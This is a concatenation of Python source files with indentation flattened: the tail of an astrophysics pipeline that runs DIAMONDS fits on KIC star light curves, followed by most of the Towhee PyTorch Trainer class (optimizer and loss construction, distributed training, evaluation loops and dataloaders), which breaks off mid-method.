nr = kwargs[cat_analysis][analysis_noise_values]*10
noise_values = np.linspace(0,kwargs[cat_analysis][analysis_noise_values],nr)
for k in noise_values:
k = float('%.1f' % k)
newcp = deepcopy_dict(cp)
newcp[internal_noise_value] = k
if analysis_folder_prefix in cp:
pre = newcp[analysis_folder_prefix]
else:
pre = "KIC"
if repeat_set:
pre = f"{pre}/noise_{k}"
else:
pre = f"{pre}_{cp[general_kic]}/noise_{k}"
newcp[analysis_folder_prefix] = pre
kwarg_list.append(newcp)
elif analysis_target_magnitude in kwargs[cat_analysis]:
min_mag = max(mag_list)
if analysis_nr_magnitude_points in kwargs[cat_analysis].keys():
nr = kwargs[cat_analysis][analysis_nr_magnitude_points]
else:
nr = 5
mag_values = np.linspace(min_mag,kwargs[cat_analysis][analysis_target_magnitude],nr)
for k in mag_values:
k = float('%.1f' % k)
newcp = deepcopy_dict(cp)
copy_dict["Original magnitude"] = i['mag']
newcp[internal_mag_value] = k
if analysis_folder_prefix in cp:
pre = newcp[analysis_folder_prefix]
else:
pre = "KIC"
if repeat_set:
pre = f"{pre}/mag_{k}"
else:
pre = f"{pre}_{cp[general_kic]}/mag_{k}"
newcp[analysis_folder_prefix] = pre
kwarg_list.append(newcp)
else:
kwarg_list.append(cp)
return kwarg_list, nr_of_cores
def run_star(kwargs: Dict):
"""
Runs a full analysis for a given kwargs file.
:param kwargs: Run conf
"""
t1 = time.time()
if analysis_folder_prefix in kwargs.keys():
prefix = kwargs[analysis_folder_prefix]
else:
prefix = "KIC"
path = f"{kwargs[general_analysis_result_path]}{prefix}_{kwargs[general_kic]}/"
if os.path.exists(path) and ((internal_force_run in kwargs.keys() and not kwargs[
internal_force_run]) or internal_force_run not in kwargs.keys()):
with cd(path):
if os.path.exists("results.json") and not os.path.exists("errors.txt"):
with open('results.json','r') as f:
old_res = json.load(f)
kwargs["time"] = float(old_res['Runtime'])
print_int("Done", kwargs)
return
try:
shutil.rmtree(path)
except FileNotFoundError:
pass
try:
makedirs(path)
except FileExistsError:
pass
with cd(path):
try:
#print_int("Starting run", kwargs)
# load and refine data
data = load_file(kwargs)
with open("conf.json", 'w') as f:
if internal_literature_value in kwargs.keys():
kwargs[internal_literature_value] = f"{kwargs[internal_literature_value]}"
if internal_delta_nu in kwargs.keys():
kwargs[internal_delta_nu] = f"{kwargs[internal_delta_nu]}"
json.dump(kwargs, f, indent=4)
if internal_literature_value in kwargs.keys():
kwargs[internal_literature_value] = ufloat_fromstr(kwargs[internal_literature_value])
if internal_delta_nu in kwargs.keys():
kwargs[internal_delta_nu] = ufloat_fromstr(kwargs[internal_delta_nu])
data,kwargs = refine_data(data, kwargs)
np.save("lc", data)
# compute nu_max
print_int("Computing nu_max", kwargs)
"""
sigma_ampl = calculate_flicker_amplitude(data)
f_ampl = flicker_amplitude_to_frequency(sigma_ampl)
nu_max, f_list, f_fliper = compute_nu_max(data, f_ampl, kwargs)
"""
# if internal_literature_value in kwargs:
# nu_max = kwargs[internal_literature_value].nominal_value
# else:
if analysis_nu_max_outer_guess in kwargs.keys():
nu_max = kwargs[analysis_nu_max_outer_guess]
else:
nu_max = compute_fliper_exact(data, kwargs)
#nu_max = kwargs[internal_literature_value].nominal_value
f_fliper = nu_max
f_list = []
if internal_literature_value in kwargs.keys():
print_int(f"Nu_max guess: {'%.2f' % nu_max}, fliper: {f_fliper} literature: {kwargs[internal_literature_value]}", kwargs)
else:
print_int(f"Nu max guess: {'%.2f' % nu_max}, fliper: {f_fliper}", kwargs)
# create files for diamonds and run
prior, params = priors(nu_max, data, kwargs)
print_int(f"Priors: {prior}", kwargs)
cnt =1
while cnt <=3:
create_files(data, nyqFreq(data), prior, kwargs)
proc = BackgroundProcess(kwargs)
if general_run_diamonds in kwargs.keys():
if kwargs[general_run_diamonds]:
proc.run()
else:
proc.run()
if general_check_bayes_run in kwargs.keys():
if is_bayes_factor_good(kwargs):
break
else:
break
cnt +=1
kwargs['Number of DIAMONDS runs'] = cnt
print_int("Saving results", kwargs)
# save results
save_results(prior, data, nu_max, params, proc, f_list, f_fliper, t1, kwargs)
delta_t = time.time() -t1
kwargs["time"] = delta_t
print_int("Done", kwargs)
except (EvidenceFileNotFound, ResultFileNotFound, InputFileNotFound) as e:
error = f"{e.__class__.__name__} : {str(e)}\n"
print_int("Done", kwargs)
trace = traceback.format_exc()
with open("errors.txt", "w") as f:
f.write(error)
f.write(trace)
except Exception as e:
print_int("Done", kwargs)
error = f"{e.__class__.__name__} : {str(e)}\n"
trace = traceback.format_exc()
with open("errors.txt", "w") as f:
f.write(error)
f.write(trace)
|
trainer.py
|
# coding=utf-8
# Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import os
import torch
import torch.distributed as dist
from typing import Union, Dict, Any, Optional
from pathlib import Path
from collections.abc import Iterable
from torch import nn
from torch import optim
from torch.optim import Optimizer
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.dataset import Dataset
from torch.multiprocessing import Process
from towhee.data.dataset.dataset import TowheeDataSet, TorchDataSet
from towhee.trainer.callback import TensorBoardCallBack, ProgressBarCallBack, PrintCallBack, ModelCheckpointCallback, \
EarlyStoppingCallback, TrainerControl, Callback
from towhee.trainer.metrics import get_metric_by_name
from towhee.trainer.modelcard import ModelCard, MODEL_CARD_NAME
from towhee.trainer.utils.trainer_utils import STATE_CHECKPOINT_NAME, MODEL_NAME, set_seed, reduce_value, \
is_main_process, send_to_device
from towhee.trainer.training_config import TrainingConfig
from towhee.utils.log import trainer_log
from towhee.trainer.optimization.optimization import get_scheduler
from towhee.trainer.callback import CallbackList, _get_summary_writer_constructor
WEIGHTS_NAME = "pytorch_model.bin"
TEMP_INIT_WEIGHTS = "./temp_init_weights.pt"
NAME = "name_"
CUSTOM = "custom_"
no_option_list = ["no", "null", "None", None, False]
def _construct_loss_from_config(module: Any, config: Union[str, Dict]):
"""
Construct from the config; the config can be a class name as a `str`, or a dict containing the construction parameters.
"""
instance = None
if isinstance(config, str):
construct_name = getattr(module, config)
instance = construct_name()
elif isinstance(config, Dict):
optimizer_construct_name = config[NAME]
construct_name = getattr(module, optimizer_construct_name)
kwargs = {}
for arg_name in config:
if arg_name != NAME:
kwargs[arg_name] = config[arg_name]
instance = construct_name(**kwargs)
return instance
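# Illustrative only (not part of the original module): both config forms below are
# accepted by _construct_loss_from_config, with names resolved against
# torch.nn.modules.loss; the "sum" reduction is an arbitrary example value.
#   _construct_loss_from_config(torch.nn.modules.loss, "CrossEntropyLoss")
#   _construct_loss_from_config(torch.nn.modules.loss, {"name_": "CrossEntropyLoss", "reduction": "sum"})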
def _construct_scheduler_from_config(module: Any, config: Union[str, Dict]):
"""
Construct from the config; the config can be a class name as a `str`, or a dict containing the construction parameters.
"""
instance = None
if isinstance(config, str):
construct_name = getattr(module, config)
instance = construct_name()
elif isinstance(config, Dict):
scheduler_construct_name = config[NAME]
construct_name = getattr(module, scheduler_construct_name)
kwargs = {}
for arg_name in config:
if arg_name != NAME:
kwargs[arg_name] = config[arg_name]
instance = construct_name(**kwargs)
return instance
def _construct_optimizer_from_config(module: Any, config: Union[str, Dict], model=None):
"""
Construct from the config; the config can be a class name as a `str`, or a dict containing the construction parameters.
"""
instance = None
if isinstance(config, str):
construct_name = getattr(module, config)
if model is not None:
instance = construct_name(model.parameters())
elif isinstance(config, Dict):
optimizer_construct_name = config[NAME]
construct_name = getattr(module, optimizer_construct_name)
kwargs = {}
for arg_name in config:
if arg_name != NAME:
kwargs[arg_name] = config[arg_name]
if model is not None:
trainable_params = [p for p in model.parameters() if p.requires_grad]
instance = construct_name(trainable_params, **kwargs)
return instance
def freeze_bn(model):
classname = model.__class__.__name__
if classname.find("BatchNorm") != -1:
model.eval()
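# freeze_bn() is applied via model.apply(freeze_bn) in set_train_mode(); putting
# BatchNorm modules into eval mode keeps their running statistics from being updated.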
class Trainer:
"""
A `Trainer` is used to train a pytorch model.
Args:
model (`nn.Module`):
A pytorch model.
training_config (`TrainingConfig`):
A `TrainingConfig` instance can be loaded from a yaml file.
train_dataset (`Union[Dataset, TowheeDataSet]`):
It can be a kind of `torch.utils.data.dataset.Dataset` or `TowheeDataSet`
eval_dataset (`Union[Dataset, TowheeDataSet]`):
The same as `train_dataset`, and it is not strictly necessary if you do not want to eval.
train_dataloader (`Union[DataLoader, Iterable]`):
When the `train_dataloader` is passed in, trainer will use it to load data
instead of constructing by input dataset.
eval_dataloader (`Union[DataLoader, Iterable]`):
The same as `train_dataloader`, and it is not strictly necessary also.
model_card (`ModelCard`):
Model card may contain other information of a model, and it is not strictly necessary.
Examples:
>>> import torch
>>> import torchvision.models as models
>>> from towhee.trainer.trainer import Trainer
>>> from towhee.trainer.training_config import TrainingConfig
>>> from towhee import dataset
>>> from torchvision import transforms
>>> import warnings
>>> warnings.filterwarnings("ignore")
>>> model = models.resnet18()
>>> fake_transform = transforms.Compose([transforms.ToTensor()])
>>> train_data = dataset('fake', size=2, transform=fake_transform)
>>> val_data = dataset('fake', size=1, transform=fake_transform)
>>> training_config = TrainingConfig(output_dir="train_res",
... tensorboard=None,
... epoch_num=2,
... batch_size=1,
... dataloader_num_workers=0,
... print_steps=1)
>>> trainer = Trainer(model, training_config, train_dataset=train_data, eval_dataset=val_data)
>>> type(trainer)
<class 'towhee.trainer.trainer.Trainer'>
>>> trainer.train() # Some values below are not necessarily reproducible
2022-03-01 19:01:54,314 - 8601085440 - trainer.py-trainer:324 - WARNING: TrainingConfig(...)
epoch=1/2, global_step=1, epoch_loss=7.107283592224121, epoch_metric=0.0
epoch=1/2, global_step=2, epoch_loss=6.959554195404053, epoch_metric=0.0
epoch=1/2, eval_global_step=0, eval_epoch_loss=6.694866180419922, eval_epoch_metric=0.0
epoch=2/2, global_step=3, epoch_loss=6.165490627288818, epoch_metric=0.0
epoch=2/2, global_step=4, epoch_loss=6.197325706481934, epoch_metric=0.0
epoch=2/2, eval_global_step=1, eval_epoch_loss=6.0876030921936035, eval_epoch_metric=0.0
>>> trainer.train(resume_checkpoint_path="train_res/epoch_1")
2022-03-01 19:01:57,004 - 8601085440 - trainer.py-trainer:324 - WARNING: TrainingConfig(...)
epoch=2/2, global_step=1, epoch_loss=6.165490627288818, epoch_metric=0.0
epoch=2/2, global_step=2, epoch_loss=6.277336120605469, epoch_metric=0.0
epoch=2/2, eval_global_step=0, eval_epoch_loss=6.097333908081055, eval_epoch_metric=0.0
>>> trainer.save(path="another_save_path")
>>> trainer.load(path="another_save_path")
>>> trainer.epoch
2
>>> model = models.resnet18()
>>> inputs = [torch.randn(1, 3, 224, 224), torch.Tensor([1]).type(torch.LongTensor)]
>>> model.eval() # turn on eval mode
ResNet(
...
)
>>> trainer.evaluate_step(model, inputs)
{'eval_step_loss': 7.10837459564209, 'eval_epoch_loss': 6.350093841552734, 'eval_epoch_metric': 0.0}
>>> trainer.update_metrics(model, inputs, torch.Tensor(1))
(5.2800750732421875, 0.0)
>>> trainer.compute_metric(model, inputs)
0.0
>>> trainer.evaluate(model, {"epoch": 1, "eval_global_step": 1})
epoch=1/2, eval_global_step=1, eval_epoch_loss=5.654547214508057, eval_epoch_metric=0.0
{'epoch': 1, 'eval_global_step': 2, 'eval_step_loss': 7.526906967163086, 'eval_epoch_loss': 5.654547214508057, 'eval_epoch_metric': 0.0}
>>> trainer.predict(inputs[0]).shape
torch.Size([1, 1000])
>>> model.train() # turn on train mode
ResNet(
...
)
>>> trainer.train_step(model, inputs)
{'step_loss': 7.10837459564209, 'epoch_loss': 5.862236976623535, 'epoch_metric': 0.0}
>>> trainer.compute_loss(model, inputs)
tensor(7.1084, grad_fn=<NllLossBackward>)
>>>
>>> from towhee.trainer.callback import Callback
>>> from typing import Dict
>>> class MyCallback(Callback):
... def on_eval_begin(self, logs: Dict) -> Dict:
... print("on_eval_begin...")
...
>>> my_callback = MyCallback()
>>> trainer.add_callback(my_callback)
>>> trainer.evaluate(model, logs={"epoch": 1, "eval_global_step": 1})
on_eval_begin...
epoch=1/2, eval_global_step=1, eval_epoch_loss=6.070321083068848, eval_epoch_metric=0.0
{'epoch': 1, 'eval_global_step': 2, 'eval_step_loss': 7.526906967163086, 'eval_epoch_loss': 6.070321083068848, 'eval_epoch_metric': 0.0}
"""
def __init__(
self,
model: nn.Module = None,
training_config: TrainingConfig = None,
train_dataset: Union[Dataset, TowheeDataSet] = None,
eval_dataset: Union[Dataset, TowheeDataSet] = None,
train_dataloader: Union[DataLoader, Iterable] = None,
eval_dataloader: Union[DataLoader, Iterable] = None,
model_card: ModelCard = None
):
if training_config is None:
output_dir = "tmp_trainer"
trainer_log.warning("No `TrainingConfig` passed.")
training_config = TrainingConfig(output_dir=output_dir)
self.configs = training_config
if model is None:
raise RuntimeError("`Trainer` requires a `model` argument")
if isinstance(train_dataset, Dataset):
self.train_dataset = train_dataset
elif isinstance(train_dataset, TowheeDataSet):
self.train_dataset = train_dataset.dataset
self.eval_dataset = eval_dataset
self.model = model
self.model_card = model_card
self.optimizer = None
self.override_optimizer = False
self.lr_scheduler_type = self.configs.lr_scheduler_type
self.lr_scheduler = None
self.lr_value = self.configs.lr
self.metric = None
self.loss = None
self.override_loss = False
self.loss_value = 0.0
self.callbacks = CallbackList()
self.loss_metric = None
self.metric_value = 0.0
self.epoch = 0
self.train_dataloader = train_dataloader
self.train_sampler = None
self.eval_dataloader = eval_dataloader
self.distributed = False
os.makedirs(self.configs.output_dir, exist_ok=True)
if not isinstance(self.model_card, ModelCard):
self.model_card = ModelCard()
if self.model_card.model_name is None:
self.model_card.model_name = type(self.model).__name__
self.model_card.model_architecture = str(self.model)
self.model_card.training_config = self.configs
def train(self, resume_checkpoint_path: Optional[str] = None):
"""
Start to train.
Args:
resume_checkpoint_path (`str`):
The checkpoint path from which to resume training.
"""
if self.configs.device_str == "cuda":
self.distributed = True
self._spawn_train_process(resume_checkpoint_path)
else:
self.distributed = False
self.run_train(resume_checkpoint_path)
def _spawn_train_process(self, resume_checkpoint_path: Optional[str]):
# world_size = torch.cuda.device_count()
# mp.spawn(self.run_train,
# args=(world_size, resume_checkpoint_path),
# nprocs=world_size, # opt.world_size,
# join=True)
process_list = []
world_size = self.configs.n_gpu
if world_size < 1:
trainer_log.warning("when `device_str` is `cuda`, `n_gpu` must be a positive int number.")
for rank in range(world_size):
process = Process(target=self.run_train, args=(resume_checkpoint_path, rank, world_size))
process.start()
process_list.append(process)
for process in process_list:
process.join()
def _init_distributed(self, rank: int, world_size: int):
if self.distributed:
if torch.cuda.is_available() is False:
raise EnvironmentError("No GPU device found for training.")
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "12355"
trainer_log.warning("_init_distributed(), rank=%s", rank)
torch.cuda.set_device(rank)
dist_backend = "nccl"
dist_url = "env://"
trainer_log.warning("| distributed init (rank %s): %s", rank, dist_url)
dist.init_process_group(backend=dist_backend, init_method=dist_url,
world_size=world_size, rank=rank)
dist.barrier()
def _load_before_train(self, resume_checkpoint_path: Optional[str], rank: Optional[int]):
# sync_bn = self.configs.sync_bn
if resume_checkpoint_path is not None:
# weights_dict = torch.load(weights_path, map_location=device)
# load_weights_dict = {k: v for k, v in weights_dict.items()
# if model.state_dict()[k].numel() == v.numel()}
# model.load_state_dict(load_weights_dict, strict=False)
self.load(resume_checkpoint_path)
else: # if using multi gpu and not resume, must keep model replicas in all processes are the same
if self.distributed:
# checkpoint_path = os.path.join(tempfile.gettempdir(), TEMP_INIT_WEIGHTS)
checkpoint_path = TEMP_INIT_WEIGHTS
if rank == 0:
torch.save(self.model.state_dict(), checkpoint_path)
dist.barrier()
self.model.load_state_dict(torch.load(checkpoint_path, map_location=self.configs.device))
if self.distributed:
self.model = torch.nn.parallel.DistributedDataParallel(self.model, device_ids=[rank])
# if sync_bn:
# self.model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(self.model).to(self.configs.device)
def _create_logs(self):
logs = {"global_step": 0, "epoch": self.epoch}
if self.configs.eval_strategy not in no_option_list:
logs["eval_global_step"] = 0
return logs
def prepare_inputs(self, inputs: Any):
return send_to_device(inputs, self.configs.device)
def run_train(self, resume_checkpoint_path: str = None, rank: int = None, world_size: int = None):
"""
Main training entry point.
It is not recommended for users to call this directly unless overriding `Trainer`.
Instead, use `trainer.train()` to start training.
Args:
resume_checkpoint_path (`str`):
Last checkpoint path.
rank (`int`):
Process rank when using multi gpus.
world_size (`int`):
Total processes count.
"""
set_seed(self.configs.seed)
self._init_distributed(rank, world_size)
self.model = self.model.to(self.configs.device)
model = self.model
self.trainercontrol = TrainerControl()
self._load_before_train(resume_checkpoint_path, rank)
# Keeping track of whether we can call len() on the dataset or not
# train_dataset_is_sized = isinstance(self.train_dataset, collections.abc.Sized)
train_dataloader = self.get_train_dataloader()
total_train_batch_size = self.configs.train_batch_size
# if train_dataset_is_sized:
num_update_steps_per_epoch = len(train_dataloader)
num_update_steps_per_epoch = max(num_update_steps_per_epoch, 1)
train_last_epoch = self.epoch
num_train_epochs = math.ceil(self.configs.epoch_num - train_last_epoch)
num_train_steps = math.ceil(num_train_epochs * num_update_steps_per_epoch)
self.setup_before_train(num_training_steps=num_train_steps, init_lr=self.lr_value)
trainer_log.info("***** Running training *****")
trainer_log.info(" Num Epochs = %d", num_train_epochs)
trainer_log.info(" Total train batch size = %d", total_train_batch_size)
trainer_log.info("****************************")
if is_main_process():
trainer_log.warning(self.configs)
logs = self._create_logs()
self.callbacks.on_train_begin(logs)
for epoch in range(train_last_epoch + 1, self.configs.epoch_num + 1):
self.epoch = logs["epoch"] = epoch
self.set_train_mode(model)
self._reset_controller()
self.optimizer.zero_grad()
if self.distributed:
self.train_sampler.set_epoch(self.epoch)
# batch_loss_sum = 0.0
self.callbacks.on_epoch_begin(self.epoch, logs)
self.loss_metric.reset()
self.metric.reset()
for step, inputs in enumerate(train_dataloader):
self.callbacks.on_train_batch_begin(inputs, logs)
inputs = self.prepare_inputs(inputs)
step_logs = self.train_step(model, inputs) # , train_dataloader)
logs["lr"] = self.lr_scheduler.get_lr()[0]
logs["global_step"] += 1
logs.update(step_logs)
self.callbacks.on_train_batch_end(tuple(inputs), logs)
self._may_evaluate(model, logs, step)
self._may_evaluate(model, logs)
self.callbacks.on_epoch_end(self.epoch, logs)
self.loss_value = logs["epoch_loss"]
self.metric_value = logs["epoch_metric"]
self.lr_value = logs["lr"]
self._create_training_summary(
finetuned_from=resume_checkpoint_path,
resumed_from_epoch=train_last_epoch if train_last_epoch != 0 else None,
num_train_epochs=self.epoch - train_last_epoch,
current_epoch=self.epoch,
end_lr=self.lr_value,
loss={"type": self.configs.loss, "value": round(self.loss_value, 3)},
metric={"type": self.configs.metric, "value": round(self.metric_value, 3)}
)
if self.trainercontrol.should_training_stop:
break
if self.trainercontrol.should_save:
self.save(
path=os.path.join(self.configs.output_dir, "epoch_" + str(self.epoch)),
overwrite=self.configs.overwrite_output_dir
)
trainer_log.info("\nTraining completed.\n")
self._cleanup_distributed(rank)
self.callbacks.on_train_end(logs)
self.save(
path=os.path.join(self.configs.output_dir, "final_epoch"),
overwrite=self.configs.overwrite_output_dir
)
def set_train_mode(self, model: nn.Module):
"""
Convert the model to training mode.
Args:
model (`nn.Module`):
"""
model.train()
if self.configs.freeze_bn:
model.apply(freeze_bn)
def _create_training_summary(self, **kwargs):
training_summary = dict(kwargs)
self.model_card.training_summary = training_summary
def _may_evaluate(self, model: nn.Module, logs: dict, step: int = -1):
if step != -1: # step end
if self.configs.eval_strategy in ["step", "steps"]:
assert self.configs.eval_steps > 0, "self.configs.eval_steps must be a positive int number"
if self.configs.eval_strategy in ["step", "steps"] and step % self.configs.eval_steps == 0:
eval_logs = self.evaluate(model, logs)
logs.update(eval_logs)
else: # epoch end
if self.configs.eval_strategy in ["epoch", "eval_epoch"]:
eval_logs = self.evaluate(model, logs)
logs.update(eval_logs)
@torch.no_grad()
def evaluate_step(self, model: nn.Module, inputs: Any) -> dict:
"""
One batch step when evaluating.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Input Tensor or any kind of collection made up by tensors.
Returns:
(`dict`)
Evaluate logs dict.
"""
inputs = self.prepare_inputs(inputs)
step_loss = self.compute_loss(model, inputs)
step_loss = reduce_value(step_loss, average=True)
step_loss = step_loss.detach()
loss_metric, epoch_metric = self.update_metrics(model, inputs, step_loss, training=False)
step_logs = {"eval_step_loss": step_loss.item(), "eval_epoch_loss": loss_metric,
"eval_epoch_metric": epoch_metric}
return step_logs
@torch.no_grad()
def update_metrics(self, model: nn.Module, inputs: Any, step_loss: torch.Tensor, training: bool = True) -> tuple:
"""
Update the loss and metric in one epoch.
When a new epoch starts, the epoch loss and epoch metric are cleared.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Torch tensor or any kind of collection made up by tensors.
step_loss (`torch.Tensor`):
One batch step loss.
training (`bool`):
Whether it's training mode now.
Returns:
(`tuple`)
Epoch loss and epoch metric.
"""
self.loss_metric.update(send_to_device(step_loss, self.configs.device))
loss_metric = self.loss_metric.compute().item()
if self.configs.eval_strategy == "eval_epoch" and training:
epoch_metric = 0
else:
epoch_metric = self.compute_metric(model, inputs)
return loss_metric, epoch_metric
@torch.no_grad()
def compute_metric(self, model: nn.Module, inputs: Any) -> float:
"""
Compute the step metric.
It is recommended to subclass `Trainer` and override this method when dealing with a custom metric in a custom task.
When it is overridden, the `compute_loss()` method often needs to be overridden as well.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Input tensor collection.
Returns:
(`float`)
Epoch average metric.
"""
model.eval()
epoch_metric = None
labels = inputs[1]
outputs = model(inputs[0])
if self.metric is not None:
self.metric.update(send_to_device(outputs, self.configs.device),
send_to_device(labels, self.configs.device))
epoch_metric = self.metric.compute().item()
return epoch_metric
@torch.no_grad()
def evaluate(self, model: nn.Module, logs: dict) -> dict:
"""
Evaluate the model.
Args:
model (`nn.Module`):
Pytorch model.
logs (`dict`):
Logs dict.
Returns:
(`dict`)
The new logs dict with evaluate values.
"""
model.eval()
self.callbacks.on_eval_begin(logs)
self.metric.reset()
eval_dataloader = self.get_eval_dataloader()
if eval_dataloader is None:
trainer_log.warning("eval_dataloader is None!")
return logs
for _, inputs in enumerate(eval_dataloader):
self.callbacks.on_eval_batch_begin(inputs, logs)
inputs = send_to_device(inputs, self.configs.device)
step_logs = self.evaluate_step(model, inputs)
logs.update(step_logs)
self.callbacks.on_eval_batch_end(tuple(inputs), logs)
logs["eval_global_step"] += 1
self.callbacks.on_eval_end(logs)
return logs
@torch.no_grad()
def predict(self, inputs: Any) -> Any:
"""
Run prediction: the model (in eval mode) takes the input value and returns the outputs.
Args:
inputs (`Any`):
Inference inputs by the model.
Returns:
(`Any`)
Output result.
"""
self.model.eval()
return self.model(inputs)
def train_step(self, model: nn.Module, inputs: Any) -> dict:
"""
The training batch step.
It computes the step loss, backpropagates it, performs one optimizer step, and computes the metric.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Pytorch tensor or tensor collection.
Returns:
(`dict`)
Step logs which contains the step loss and metric infos.
"""
step_loss = self.compute_loss(model, inputs)
step_loss = reduce_value(step_loss, average=True)
step_loss.backward()
step_loss = step_loss.detach()
loss_metric, epoch_metric = self.update_metrics(model, inputs, step_loss, training=True)
self.optimizer.step()
self.lr_scheduler.step()
self.optimizer.zero_grad()
step_logs = {"step_loss": step_loss.item(), "epoch_loss": loss_metric, "epoch_metric": epoch_metric}
return step_logs
def _cleanup_distributed(self, rank: int):
if self.distributed:
if rank == 0:
if os.path.exists(TEMP_INIT_WEIGHTS) is True:
os.remove(TEMP_INIT_WEIGHTS)
dist.destroy_process_group()
def compute_loss(self, model: nn.Module, inputs: Any):
"""
Compute the step loss.
It is recommended to subclass `Trainer` and override this method when dealing with a custom loss in a custom task.
When it is overridden, the `compute_metric()` method often needs to be overridden as well.
Args:
model (`nn.Module`):
Pytorch model.
inputs (`Any`):
Model inputs when training.
Returns:
(`Any`)
Loss values with `grad_fn`.
"""
self.set_train_mode(model)
labels = inputs[1]
outputs = model(inputs[0])
loss = self.loss(outputs, labels)
return loss
def push_model_to_hub(self):
# todo
pass
def add_callback(self, callback: Callback, singleton: bool = True):
"""
Users can add their custom callbacks into the trainer.
Args:
callback (`Callback`):
Custom callback.
singleton (`bool`):
Whether this kind of callback is singleton.
When singleton, the same class instance in `trainer.callbacks` will be replaced.
"""
self.callbacks.add_callback(callback, singleton)
def set_optimizer(self, optimizer: optim.Optimizer, optimizer_name: str = None):
"""
Set custom optimizer
Args:
optimizer (`optim.Optimizer`):
User's custom optimizer instance.
optimizer_name (`str`):
The optimizer string in the training config; if it is `None`, a default value is used.
Examples:
>>> from towhee.trainer.trainer import Trainer
>>> from typing import Optional, Callable
>>> from torch import optim
>>> import torchvision.models as models
>>> model = models.resnet18()
>>> trainer = Trainer(model)
2022-03-01 17:22:52,306 - 8614221312 - trainer.py-trainer:173 - WARNING: No `TrainingConfig` passed.
>>> class MyOptimizer(optim.Optimizer):
... def step(self, closure: Optional[Callable[[], float]]=...) -> Optional[float]:
... print('my step...')
...
>>> my_optimizer = MyOptimizer(model.parameters(), defaults={})
>>> trainer.set_optimizer(my_optimizer)
>>> type(trainer.optimizer)
<class '__main__.MyOptimizer'>
"""
self.override_optimizer = True
self.configs.optimizer = CUSTOM if optimizer_name is None else optimizer_name
self.optimizer = optimizer
def set_loss(self, loss: Any, loss_name: str = None):
"""
Set custom loss
Args:
loss (`Any`):
User's custom loss instance.
loss_name (`str`):
The loss string in the training config; if it is `None`, a default value is used.
Examples:
>>> from towhee.trainer.trainer import Trainer
>>> import torchvision.models as models
>>> import torch
>>> model = models.resnet18()
>>> trainer = Trainer(model)
2022-03-01 17:34:36,873 - 8605304320 - trainer.py-trainer:173 - WARNING: No `TrainingConfig` passed.
>>> class MyTripletLossFunc(torch.nn.Module):
... def forward(self):
... print('forward...')
... return 0
...
>>> my_loss = MyTripletLossFunc()
>>> trainer.set_loss(my_loss)
>>> type(trainer.loss)
<class '__main__.MyTripletLossFunc'>
"""
self.override_loss = True
self.configs.loss = CUSTOM if loss_name is None else loss_name
self.loss = loss
def _get_num_workers(self):
if self.configs.dataloader_num_workers == -1:
num_workers = min([os.cpu_count(), self.configs.batch_size if self.configs.batch_size > 1 else 0, 8])
else:
num_workers = self.configs.dataloader_num_workers
if is_main_process():
trainer_log.info("num_workers=%s", num_workers)
return num_workers
def get_train_dataloader(self) -> DataLoader:
"""
Get the training dataloader.
Returns:
('Optional[DataLoader]')
The dataloader to fit data to train the model.
"""
if self.train_dataloader is not None:
return self.train_dataloader
if self.train_dataset is None:
raise ValueError("Trainer: training requires a train_dataset.")
if isinstance(self.train_dataset, TorchDataSet):
self.train_dataset = self.train_dataset.dataset
num_workers = self._get_num_workers()
# if isinstance(self.train_dataset, IterableDataset):
# return DataLoader(
# self.train_dataset,
# batch_size=self.configs.train_batch_size,
# )
if not self.distributed:
return DataLoader(
self.train_dataset,
batch_size=self.configs.train_batch_size,
shuffle=True,
num_workers=num_workers, # self.configs.dataloader_num_workers,
pin_memory=self.configs.dataloader_pin_memory,
drop_last=self.configs.dataloader_drop_last
)
else:
self.train_sampler = torch.utils.data.distributed.DistributedSampler(self.train_dataset)
train_batch_sampler = torch.utils.data.BatchSampler(
self.train_sampler, self.configs.batch_size, drop_last=True)
return torch.utils.data.DataLoader(self.train_dataset,
batch_sampler=train_batch_sampler,
num_workers=num_workers, # self.configs.dataloader_num_workers,
pin_memory=self.configs.dataloader_pin_memory,
)
def get_eval_dataloader(self) -> Optional[DataLoader]:
"""
Get the eval dataloader.
Returns:
(`Optional[DataLoader]`)
The dataloader to fit data to eval the model.
"""
if self.eval_dataloader is not None:
return self.eval_dataloader
if self.eval_dataset is None:
trainer_log.warning("Trainer: eval requires a train_dataset.")
return None
if isinstance(self.eval_dataset, TorchDataSet):
self.eval_dataset = self.eval_dataset.dataset
# if isinstance(self.eval_dataset, IterableDataset):
# return DataLoader(
# self.eval_dataset,
# batch_size=self.configs.eval_batch_size,
# )
num_workers = self._get_num_workers()
if not self.distributed:
return DataLoader(
self.eval_dataset,
batch_size=self.configs.eval_batch_size,
num_workers=num_workers, # self.configs.dataloader_num_workers,
pin_memory=self.configs.dataloader_pin_memory,
drop_last=self.configs.dataloader_drop_last
)
else:
eval_sampler = torch.utils.data.distributed.DistributedSampler(self.eval_dataset)
eval_batch_sampler = torch.utils.data.BatchSampler(
eval_sampler, self.configs.batch_size, drop_last=True)
return torch.utils.data.DataLoader(self.eval_dataset,
batch_sampler=eval_batch_sampler,
num_workers=num_workers, # self.configs.dataloader_num_workers,
pin_memory=self.configs.dataloader_pin_memory,
)
def setup_before_train(self, num_training_steps: int, init_lr: float):
"""
Setup some configs before training.
Args:
num_training_steps (`int`):
All training steps in all training loops.
init_lr (`float`):
Start learning rate.
"""
self._create_optimizer(init_lr=init_lr)
self._create_loss()
self._create_metric()
self._create_scheduler(num_training_steps=num_training_steps, optimizer=self.optimizer)
self._create_callbacks()
def _create_callbacks(self):
# print or progressbar
if self.configs.print_steps is None:
self.callbacks.add_callback(ProgressBarCallBack(total_epoch_num=self.configs.epoch_num,
train_dataloader=self.get_train_dataloader()))
else:
self.callbacks.add_callback(PrintCallBack(total_epoch_num=self.configs.epoch_num,
step_frequency=self.configs.print_steps))
# early stop
if self.configs.early_stopping not in no_option_list:
